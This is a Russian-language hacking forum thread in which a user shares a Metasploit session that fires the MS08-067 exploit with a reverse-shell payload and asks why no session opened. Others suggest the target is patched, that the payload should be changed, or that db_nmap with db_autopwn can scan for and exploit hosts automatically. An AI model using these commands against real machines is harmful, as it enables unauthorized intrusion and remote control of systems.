ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |

10.01.2011, 16:22
|
|
Новичок
Регистрация: 12.09.2009
Сообщений: 0
Провел на форуме: 8983
Репутация:
0
|
|
Вудает мне следуюшию ошибку
Код:
Code:
msf > use exploit/windows/smb/ms08_067_netapi
msf > set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.1.1.115
msf exploit(ms08_067_netapi) > set LPORT 55555
msf exploit(ms08_067_netapi) > set RHOST 10.1.1.15
msf exploit(ms08_067_netapi) > exploit
PAYLOAD => windows/shell/reverse_tcp
LHOST => 10.1.1.115
LPORT => 55555
RHOST => 10.1.1.15
[*] Started reverse handler on 10.1.1.115:55555
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.
Кто то сталкивался ?
Знает как исправить ?
|
|
|

10.01.2011, 18:19
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме: 479
Репутация:
0
|
|
Патч стоит.
|
|
|

11.01.2011, 16:02
|
|
Guest
Сообщений: n/a
Провел на форуме: 22665
Репутация:
-6
|
|
Сообщение от None
Патч стоит.
Не обязательно. Может просто этот язык не поддерживает.
//
|
|
|
|

11.01.2011, 19:07
|
|
Новичок
Регистрация: 12.09.2009
Сообщений: 0
Провел на форуме: 8983
Репутация:
0
|
|
Сообщение от DCrypt
DCrypt said:
Патч стоит.
Что за патч ?
запускал через msfgui
|
|
|

11.01.2011, 19:14
|
|
Постоянный
Регистрация: 13.11.2009
Сообщений: 437
Провел на форуме: 709575
Репутация:
17
|
|
Короче если не прокатывает этот сплоит, больше нефиг тыркаться, ищи другой или забей
|
|
|

11.01.2011, 19:30
|
|
Новичок
Регистрация: 12.09.2009
Сообщений: 0
Провел на форуме: 8983
Репутация:
0
|
|
Сообщение от cheater_man
cheater_man said:
Короче если не прокатывает этот сплоит, больше нефиг тыркаться, ищи другой или забей
Я этого и не догоняю
Exploit completed, but no session was created.
Exploit прошел, но payload не сработал ?
Или сам exploit не прошел ?
|
|
|

12.01.2011, 01:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 22665
Репутация:
-6
|
|
Это оно говорит, мол сделал всё как надо, но ничего не произошло. Посмотри для каких версий виндовс этот эксплоит. Если всё будет подходить -- попробуй сменить пэйлоуд. А если и это не поможет, то скорее всего, что система пропатчена, лучше поищи посвежее эксплоит. Успехов.
|
|
|
|

12.01.2011, 01:46
|
|
Постоянный
Регистрация: 29.07.2009
Сообщений: 400
Провел на форуме: 1455812
Репутация:
150
|
|
Сообщение от None
лучше поищи посвежее эксплоит.
+1 или db_nmap + db_autopwn попробуй
Этот эксплоит прокатит наверное только на SP1, что давольно редко встречается.
|
|
|

02.03.2011, 16:10
|
|
Новичок
Регистрация: 06.12.2009
Сообщений: 2
Провел на форуме: 15870
Репутация:
3
|
|
В сети где-то встречал статьи по работе msf совместно с nmap... Довольно удобно... Получается инструмент для нахождения уязвимости и автоматической ее реализации... Погугли на тему msf...
|
|
|

04.03.2011, 00:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 28895
Репутация:
4
|
|
А что там гуглить в консоли msf
подключить драйвер дб db_driver sqlite3
создать таблицу db_create blabla
старт скана db_nmap -sV localhost
ну и автомат подбор сплойта db_autopwn -p -e.
Вот и все ...
|
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|